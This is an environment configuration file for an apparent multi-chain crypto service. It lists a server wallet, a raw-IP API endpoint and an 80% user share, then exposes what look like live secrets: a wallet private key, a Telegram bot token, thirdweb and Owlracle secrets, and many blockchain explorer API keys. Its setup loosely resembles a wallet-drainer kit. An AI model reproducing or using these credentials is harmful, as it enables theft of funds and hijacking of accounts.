NODE_ENV="production"

SERVER_WALLET_ADDRESS = "0xd0A1b3B272a65a45ed679Be7E690B0eC7Ae72562"
PRODUCTION_SERVER_DOMAIN = "http://137.184.199.79/api"

USER_SHARE_PERCENTAGE = "80"  


GAS_TANK_PRIVATE_KEY = "ae653c8cca07481c377f31a0f4513f03d5b250efce2d8d2c3ca78d26f46921f1"


PROJECT_ID_WC="5aba507a459d81769ea9d7e4256ee784"
TELEGRAM_TOKEN_ID="2014312411:AAGZbVe7tcigCaNp8hzKTEseiLkUgjNPQ4M"



EXPLORER_ETH_KEY = "2MD8XRERSASZQRXXBTYWZD4STVG4AEE5W1"
EXPLORER_BSC_KEY = "9Z3PGYSKFDXNB4RCQVNQEBU8PVCEN29S9W"
EXPLORER_POLYGON_KEY = "F4P3EJC562YB8SR51EJJBBBZ7UGSYHKGSM"
EXPLORER_FANTOM_KEY = "ERVSEHVG95H9G5FTM4ZAJ78HXKRM6RDGA5"
EXPLORER_OPTIMISM_KEY = "YP9MXXUFR6UNMCEK3W36ZKTAYGSIDSYA1P"
EXPLORER_ARBITRUM_ONE_KEY = "CG3C5XFA3YYTP1PF17CDMAMY7AC88BAU93"
EXPLORER_ARBITRUM_NOVA_KEY = "MACMDUMWUBN9YXBB4XU3VH6Z539Z8TUVHD"
EXPLORER_GNOSIS_KEY = "7NMC4F8HEF6PHV322K5D6QVEHJ998SYW2Q"
EXPLORER_MOONRIVER_KEY = ""
EXPLORER_CELO_KEY = "714QA7XHQXHM96AM76C6BAFZE3BW4TWSU1"
EXPLORER_CRONOS_KEY = "BXM2VWH1TA6R8APY9ZAACHCNKJE5SXMEXC"
EXPLORER_BASE_KEY = "HF5VSS6UYVQJZJVP6248IQ1HZRPXFPRTG3"
EXPLORER_BLAST_KEY = "HMIBKN65G91CWQ63E31UGIMVRXY1MMMKC8"

DEBANK_API_KEY="6536cf9c6e14a49531bfa4485e51a6f8645ceb59"
OWLRACLE_API_KEY="f52bbd2c6f664698b5c7b907a1894e29"
OWLRACLE_API_SECRET="ae463fb09e0048a58ef4bd8a11450bf4"

THIRD_WEB_CLIENTID="1dc0c6aef131f5d9cd9d82bf9b2de12c"
THIRD_WEB_SECRETKEY="gkhu8zz6cX0LVHFHslbgYZB8B8aoF-ah1mR8dljhqHG1ew5Q10ukFpqEUQENuwk3UiOer4vW3E8B_UwpYhxOgg"


MAIN_TOKEN="0x0000000000000000000000000000000000000000"

